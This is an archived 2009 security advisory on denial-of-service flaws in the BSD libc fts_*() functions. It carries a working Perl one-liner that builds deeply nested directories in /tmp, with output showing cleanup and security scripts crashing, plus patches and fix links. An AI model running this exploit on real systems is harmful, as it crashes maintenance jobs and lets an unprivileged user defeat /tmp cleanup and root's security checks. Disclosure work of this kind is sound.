exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

libc:fts_*() Denial Of Service

libc:fts_*() Denial Of Service
Posted Oct 2, 2009
Authored by Maksymilian Arciemowicz | Site securityreason.com

libc:fts_*() suffers from multiple denial of service vulnerabilities. This affects multiple vendors.

tags | exploit, denial of service, vulnerability
SHA-256 | 60fdb0c5abb5e3ce9c4855e6377fd45eb308fb523b2c8e1b8e6eaf4ed9349437

libc:fts_*() Denial Of Service

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[libc:fts_*() Multiple Denial of Service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 03.08.2009
- - Pub.: 02.10.2009

We are going inform all vendors, about this problem.

Affected Software (official):
- - OpenBSD 4.5 (fix available)
- - NetBSD 5.0.1 (fix available)

probably more...

Original URL:
http://securityreason.com/achievement_securityalert/68

- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies. The fts_open() function returns a "handle" on a file
hierarchy, which is then supplied to the other fts functions. The function fts_read() returns a pointer to a structure
describing one of the files in the file hierarchy. The function fts_children() returns a pointer to a linked list of structures,
each of which describes one of the files contained in a directory within the hierarchy.

typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure
*/
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* depth (-1 to N) */
int fts_errno; /* file errno */
long fts_number; /* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;

- --- 1. libc:fts_*() Multiple Denial of Service ---
In March 2009, we have reported an issue (SREASONRES:20090304) in libc (fts.c). Now we want to present the conclusions and show
the usefulness of this vulnerabality. Fix provided by OpenBSD Team will protect us by crash but we think, not for all cases,
that are showed in this advisory.

Index: fts.c
===================================================================
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- - --- fts.c 27 Dec 2008 12:30:13 -0000 1.41
+++ fts.c 10 Feb 2009 09:00:24 -0000
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp->fts_pathlen - len;

+ if (cur->fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur->fts_level + 1;

/* Read the directory, attaching each entry to the `link' pointer. */

So let`s see /etc/rc.d/cleartmp (NetBSD 5.0.1). This script use rm(1) with rf args.

Line 40-41:
find -x . ! -name . ! -name lost+found ! -name quota.user \
! -name quota.group -exec rm -rf -- {} \; -type d -prune)


here daemon will come to tmp_dir (/tmp) and wants clean it with the sequence "[a-km-pr-zA-Z]*". It will kill this script anytime
when they will be started. So if we create directory "A" in /tmp, all other files and directories in alphabetical order, will
not be delete.

Proof of Concept:
User cxib, have created exploit in main /tmp dir.

exploit:
127# cd /tmp && perl -e '$a="C"x22;for(1..50000){ ! -d $a and mkdir $a and chdir $a }'

In /tmp we have

# ls -la
total 22
drwxrwxrwt 10 root wheel 512 Aug 11 01:18 .
drwxr-xr-x 27 root wheel 1024 Aug 11 00:09 ..
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
- -r--r--r-- 1 root wheel 11 Aug 11 00:11 .X0-lock
drwxrwxrwt 2 root wheel 512 Aug 11 00:11 .X11-unix
- -rw-r--r-- 1 root wheel 0 Aug 11 01:18 A
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 B
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CCCCCCCCCCCCCCCCCCCCCC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx------ 2 root wheel 512 Aug 11 00:49 kde-root
drwx------ 3 root wheel 512 Aug 11 01:14 ksocket-root
drwx------ 2 root wheel 512 Aug 11 00:11 mc-root

correct behavior will delete all files after reboot. So lets do it.

# reboot

Now we have in /tmp

# ls -la
total 18
drwxrwxrwt 9 root wheel 512 Aug 11 13:57 .
drwxr-xr-x 27 root wheel 1024 Aug 11 14:02 ..
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
drwxrwxrwt 2 root wheel 512 Aug 11 01:19 .X11-unix
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CCCCCCCCCCCCCCCCCCCCCC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx------ 2 root wheel 512 Aug 11 00:49 kde-root
drwx------ 3 root wheel 512 Aug 11 01:19 ksocket-root
drwx------ 2 root wheel 512 Aug 11 00:11 mc-root


file A and dir B has been deleted. But file chujwamwmuzg and directories {D,Cx22} are still avaliable. To resolve, we can use
openbsd fix. However, this does not fully resolve the problem. The user can create a direcory (like Cx22) that can not be
removed by rm(1).

To remove Cx22 folder, we can use program made by openbsd

- ---
#include <err.h>
#include <stdlib.h>
#include <unistd.h>

int
main(int argc, char *argv[])
{
int ret = 0;

while (chdir(argv[1]) == 0)
;

warn("chdir");
while (ret == 0) {
unlink("du.core");
ret = chdir("..");
if (ret)
err(1, "chdir");
ret = rmdir(argv[1]);
if (ret)
err(1, "rmdir");
}
}
- ---

However, if the attacker uses a random functions, the removal prooccess of such trees will not be easy. libc/fts do not support
trees bigger as SHRT_MAX. NetBSD has first changed it to INT_MAX (fix)

There are still a few other PoC. If option find_core is "yes" (default), we can turn off this option for root using our exploit
in advisory.

vulnerable code in file /etc/daily (netbsd)
find / \( $ignfstypes \) -prune -o \
-name 'lost+found' -prune -o \
\( -name '*.core' -o -name 'core' \) -type f -print > $TMP

under NetBSD root will get

- ---
Uptime: 3:15AM up 6:22, 9 users, load averages: 0.34, 0.21, 0.18
[1] Segmentation fault (core dumped) find / "(" ${ign...
- ---

next vulnerable code is located in /etc/security. Option check_devices will display any changes in setuid files and devices.

- ---
find / $ignexpr \
\( \( -perm -u+s -a ! -type d \) -o \
\( -perm -g+s -a ! -type d \) -o \
-type b -o -type c \) -print0 | \
xargs -0 ls -ldgTq | sort +9 > $LIST
- ---

in netbsd, after attack root will get
- ---
Checking setuid files and devices:
Setuid/device find errors:
ls: /dev/ttyC: No such file or directory
[1] Segmentation fault (core dumped) find / ${ignexpr... |
Done(123) xargs -0 ls -ldgTq |
Done sort +9 >${LIST}
- ---

in openbsd
- ---
Checking setuid/setgid files and devices:
Setuid/device find errors:
find: fts_read: File name too long

Removing scratch and junk files:
find: fts_read: File name too long

- ---

We can try find a few others PoC for this issue.

We think the system should have more control over file system. Abstract solution are not good.

This vulnerability can also prevent use options like per_user_tmp=yes. If the attacker creates such a structure with different
names, the administrator will be deprived of opportunities to change settings for /tmp. Affected programs
(rm(1),cp(1),find(1),chmod(1),chown(1) etc) are also found in other scripts.

- --- 2. Fix ---
This fix will change libc:fts structure

NetBSD fix:
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/distrib/sets/lists/base/md.amd64#rev1.63
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/distrib/sets/lists/base/md.sparc64#rev1.57
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/distrib/sets/lists/base/shl.mi#rev1.485
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/include/fts.h#rev1.19
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/shlib_version#rev1.214
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/compat/gen/Makefile.inc#rev1.12
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/compat/gen/compat___fts50.c#rev1.1
http://cvsweb.de.netbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/gen/fts.c#rev1.39

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/include/fts.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/find/function.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.3
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/du/du.c

Old OpenBSD fix for SREASONRES:20090304:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c

http://securityreason.com/achievement_securityalert/60 (SREASONRES:20090304)

- --- 2. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 3. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib }a.t{ securityreason (d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAkrFrXAACgkQpiCeOKaYa9aTogCeJB/W0UpO2UtSesNV37sX8Aos
39kAnjo0b9tWTL0wmZhmVao97gMXqBNd
=O28t
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close